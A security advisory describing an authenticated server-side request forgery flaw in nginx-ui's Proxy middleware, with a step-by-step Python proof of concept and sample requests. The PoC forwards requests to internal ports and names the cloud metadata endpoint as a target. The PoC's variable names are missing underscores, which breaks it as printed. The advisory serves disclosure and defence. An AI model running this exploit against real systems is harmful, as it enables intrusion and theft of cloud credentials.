PT-2026-39166 — SSRF in Go Github.Com/0Xjacky/Nginx-Ui

PT-2026-39166 · Go · Github.Com/0Xjacky/Nginx-Ui

Published

2026-04-29

Updated

2026-04-29

CVSS v3.1

8.5

High

Vector

AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Summary

An authenticated user can perform Server-Side Request Forgery (SSRF) by creating a cluster node pointing to an arbitrary internal URL and then sending API requests with the X-Node-ID header. The Proxy middleware forwards these requests to the attacker-specified internal address, bypassing network segmentation and enabling access to services bound to localhost or internal networks.

Details

The nginx-ui Proxy middleware (internal/middleware/proxy.go) intercepts API requests containing an X-Node-ID header and forwards them to the URL of the corresponding cluster node. An attacker can:

Read the node secret from GET /api/settings (accessible to any authenticated user)
Create a cluster node via POST /api/nodes pointing to any internal URL:

json

{
  "name": "ssrf node",
  "url": "http://127.0.0.1:51820",
  "token": "<node secret>",
  "enabled": true
}

Send any API request with the X-Node-ID header set to the created node's ID:

GET /api/settings HTTP/1.1
Authorization: <token>
X-Node-ID: 1

The Proxy middleware forwards this request to http://127.0.0.1:51820/api/settings, making a server-side request to the internal address.

Vulnerable code path:

internal/middleware/proxy.go — Proxy(): no validation of the node URL; allows 127.0.0.1, localhost, internal IPs, cloud metadata endpoints, etc.

The node URL is not restricted to external addresses or validated against an allowlist. Combined with the njs Code Injection vulnerability (separate advisory), this SSRF is used to trigger the njs payload executing on an internal-only nginx port, completing the RCE chain.

PoC

python

import requests

BASE = "http://TARGET:9000"
TOKEN = "<authenticated jwt token>"
HDR = {"Authorization": TOKEN}

# Step 1: Get node secret
settings = requests.get(f"{BASE}/api/settings", headers=HDR).json()
node secret = settings["node"]["secret"]

# Step 2: Create SSRF node pointing to internal service
resp = requests.post(f"{BASE}/api/nodes", headers=HDR, json={
  "name": "ssrf",
  "url": "http://127.0.0.1:51820", # internal-only port
  "token": node secret,
  "enabled": True,
})
node id = resp.json()["id"]

# Step 3: SSRF — request is forwarded to http://127.0.0.1:51820/api/settings
resp = requests.get(
  f"{BASE}/api/settings",
  headers={**HDR, "X-Node-ID": str(node id)},
)
print(resp.status code, resp.text[:200])
# Response comes from the INTERNAL service, not nginx-ui

This can also target cloud metadata endpoints (e.g., http://169.254.169.254/latest/meta-data/) or any other internal service.

Impact

An authenticated attacker can:

Access internal services bound to localhost or private networks that are not intended to be externally reachable
Access cloud metadata endpoints (AWS/GCP/Azure instance metadata) to steal IAM credentials
Port-scan internal networks by creating nodes pointing to different internal IPs/ports
Trigger internal-only njs endpoints to escalate privileges (as demonstrated in the companion RCE advisory)
Bypass network segmentation and firewalls that only restrict inbound traffic

Fix

SSRF

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-918

Related Identifiers

GHSA-WR32-99HH-6F35

Affected Products

Github.Com/0Xjacky/Nginx-Ui